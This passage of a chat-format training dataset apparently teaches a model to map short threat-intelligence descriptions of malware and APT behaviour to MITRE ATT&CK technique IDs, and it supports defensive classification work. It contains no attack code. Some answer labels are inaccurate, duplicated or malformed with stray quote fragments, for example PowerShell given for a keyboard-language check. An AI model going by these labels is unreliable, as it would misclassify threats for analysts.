- "content": "Sidewinder has used VBScript to drop and execute malware loaders."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IndigoZebra has downloaded additional files and tools from its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Using job opportunities as template is the known method used by Lazarus to target its victims. The documents created by this actor are well designed and contain a large icon for a known company such as LockHeed Martin, BAE Systems, Boeing and Northrop Grumman in the template. In this campaign the actor has targeted people that are looking for job opportunities at Lockheed Martin. The document’s metadata used in this campaign links them to several other documents used by this actor in the past"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan has used JavaScript to create a shortcut file in the Startup folder that points to its main backdoor."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JPIN can inject content into lsass.exe to load a module."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FlawedAmmyy will attempt to detect anti-virus products during the initial infection."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire can utilize built-in modules to modify service binaries and restore them to their original state."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SpicyOmelette can identify the IP of a compromised system."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The diagram below illustrates the methodology used by the actor to communicate with the FoggyWeb backdoor located on a compromised internet-facing AD FS server"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OSInfo enumerates local and domain users"
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account', 'T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware can be instructed to search for recently-used documents or other interesting files. It can monitor specific directories and removable devices, report any changes and exfiltrate files of the attackers’ choice"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some strings in HOMEFRY are obfuscated with XOR x56."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SILENTTRINITY has the ability to set its window state to hidden."
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "communicates with its C2 server over HTTPS."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Finally the script deletes the shadow copies, in a preparation for the ransomware operations."
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Duqu examines running system processes for tokens that have specific system privileges. If it finds one, it will copy the token and store it for later use. Eventually it will start new processes with the stored token attached. It can also steal tokens to acquire administrative privileges."
- },
- {
- "role": "assistant",
- "content": "T1134 - Access Token Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has performed screen captures of victims, including by using a tool, scr.exe (which matched the hash of ScreenUtil)."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of writing a file to the compromised system from the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zeus Panda encrypts strings with XOR and obfuscates the macro code from the initial payload. Zeus Panda also encrypts all configuration and settings in AES and RC4."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca collected information on user accounts via the \"whoami\" command."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Okrum was seen using NetSess to discover NetBIOS sessions."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETWIRE has been executed through luring victims into opening malicious documents."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Based upon the instructional guide and the provided tools, this package appears consistent with the methodologies FireEye outlined in their research on how these attacks were executed, including specific details such as the use of ICAP via a proxy passthrough, in this case specifically squid, and using certbot to create a Let’s Encrypt SSL certificate"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ryuk has stopped services related to anti-virus."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can use DDE to execute additional payloads on compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After executing the sample, we noticed the sample copied itself to a hidden folder and launched from the hidden folder. This is a good first step to hide itself from casual observation on disk"
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLUELIGHT can download additional files onto the host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The 2019 Linux variant of the GoldMax backdoor is almost identical in functionality and implementation to the previously identified May 2020 Windows variant. The very few additions to the backdoor between 2019 and 2020 likely reflect its maturity and longstanding evasion of detections. It is likely GoldMax has been used as a long-term persistence backdoor during StellarParticle-related compromises, which would be consistent with the few changes made to the malware to modify existing functions or support additional functionality."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wingbird drops a malicious file (sspisrv.dll) alongside a copy of lsass.exe, which is used to register a service that loads sspisrv.dll as a driver. The payload of the malicious driver (located in its entry-point function) is executed when loaded by lsass.exe before the spoofed service becomes unstable and crashes."
- },
- {
- "role": "assistant",
- "content": "T1547.008 - Boot or Logon Autostart Execution: LSASS Driver"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has encrypted and encoded data in its malware, including by using base64."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SharpStage has used a legitimate web service for evading detection."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Koadic can download files off the target system to send back to the server."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In one version of the malware, the code checks if the “ProgramData” folder has folders or files with the keywords “Kasper“, “Panda“, or “ESET“"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can download and execute files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "httpclient opens cmd.exe on the victim."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 used dynamic DNS resolution to construct and resolve to randomly-generated subdomains for C2."
- },
- {
- "role": "assistant",
- "content": "T1568 - Dynamic Resolution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TAINTEDSCRIBE can execute \"ProcessList\" for process discovery."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Drovorub can delete specific files from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KeyBoy installs a keylogger for intercepting credentials and keystrokes."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Several Lazarus Group has conducted word searches on compromised machines to identify specific documents of interest. Lazarus Group malware can use a common function to identify target files by their extension, and some also enumerate files and directories, including a Destover-like variant that lists files and gathers information for all drives."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ThiefQuest uploads files via unencrypted HTTP."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used bitsadmin.exe to download additional tools."
- },
- {
- "role": "assistant",
- "content": "T1197 - BITS Jobs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "searches the local system and gathers data."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "samples were timestomped by the authors by setting the PE timestamps to all zero values. also has a built-in command to modify file times."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Shark can use encrypted and encoded files for C2 configuration."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has packed malware with UPX."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "captures the content of the desktop with the screencapture binary."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LOWBALL uses the Dropbox API to request two files, one of which is the same file as the one dropped by the malicious email attachment. This is most likely meant to be a mechanism to update the compromised host with a new version of the LOWBALL malware."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 has used malicious links to lure victims into downloading malware."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To do this, Tick uses a number of publicly available hacktools such as Mimikatz, GSecdump, and Windows Credential Editor. The tools are downloaded and deployed to the original install directory previously created by the malware"
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Frankenstein has uploaded and downloaded files to utilize additional plugins."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DustySky scans the victim for files that contain certain keywords and document types including PDF, DOC, DOCX, XLS, and XLSX, from a list that is obtained from the C2 as a text file. It can also identify logical drives for the infected machine."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Denis has a version written in PowerShell."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This is exceedingly noisy traffic. Furthermore, Hancitor has demonstrated a noticeable lack of stealth in deploying and using this ping tool. Such an unusual EXE file is easy to notice, especially when the results of its scan are saved as a text file in the same directory."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool', 'T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The first thing this malware does is it copies itself to the startup directory for persistence"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbanak logs key strokes for configured processes and sends them back to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has used code signing certificates issued by Sectigo RSA for some of its malware and tools."
- },
- {
- "role": "assistant",
- "content": "T1588.003 - Code Signing Certificates"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Frankenstein has communicated with a C2 via an encrypted RC4 byte stream and AES-CBC."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan has established domains that impersonate legitimate entities to use for targeting efforts."
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has exfiltrated archives of collected data previously staged on a target's OWA server via HTTPS."
- },
- {
- "role": "assistant",
- "content": "T1048.002 - Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IceApple can harvest credentials from local and remote host registries."
- },
- {
- "role": "assistant",
- "content": "T1552.002 - Unsecured Credentials: Credentials in Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Duqu will inject itself into different processes to evade detection. The selection of the target process is influenced by the security software that is installed on the system (Duqu will inject into different processes depending on which security suite is installed on the infected host)."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GreyEnergy has a module for Mimikatz to collect Windows credentials from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PwDumpVariant: This tool imports lsremora.dll (often downloaded by the attacker as part of the toolset) and uses the GetHash export of this DLL. On execution, the tool injects itself into lsass.exe and is triggered with the argument “dig"
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SysUpdate can search files on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LAPSUS$ has searched a victim's network for collaboration platforms like SharePoint to discover further high-privilege account credentials."
- },
- {
- "role": "assistant",
- "content": "T1213.002 - Sharepoint"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malicious payload associated with the campaign appears to be a new version of Zeus Panda, a banking trojan designed to stealing banking and other sensitive credentials for exfiltration by attackers. The payload that Talos analyzed was a multi-stage payload, with the initial stage featuring several anti-analysis techniques designed to make analysis more difficult and prolonged execution to avoid detection. It also featured several evasion techniques designed to ensure that the malware would not execute properly in automated analysis environments, or sandboxes. The overall operation of the Zeus Panda banking trojan has been well documented, however Talos wanted to provide additional information about the first stage packer used by the malware. The malware will first query the system's keyboard mapping to determine the language used on the system. It will terminate execution if it detects the any of the following keyboard mappings"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1614.001 - System Location Discovery: System Language Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Comnie allows the attacker to provide and subsequently execute a batch script (BAT), executable file (EXE), or dynamic-link library (DLL)"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has used emails containing Word, Excel and/or HWP (Hangul Word Processor) documents in their spearphishing campaigns."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ObliqueRAT can discover pluggable/removable drives to extract files from."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Embed \"scriptlets\" in generated payloads to perform some tasks \"offline\" without needing network connectivity (ex: start keylogger, add persistence, execute custom python script, check_vm, etc.) Multiple Target Platforms: Platform Support Status Windows XP Supported Windows 7 Supported Windows 8 Supported Windows 10 Supported Linux Supported Mac OSX Limited Support Android Limited Support Documentation All documentation can be found on the wiki"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API', 'T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has disabled and uninstalled security tools such as Alibaba, Tencent, and BMC cloud monitoring agents on cloud-based infrastructure."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Strings in the backdoor are encrypted using a custom algorithm that uses XOR with a 4-byte key"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aquatic Panda has attempted to stop endpoint detection and response (EDR) tools on compromised systems."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
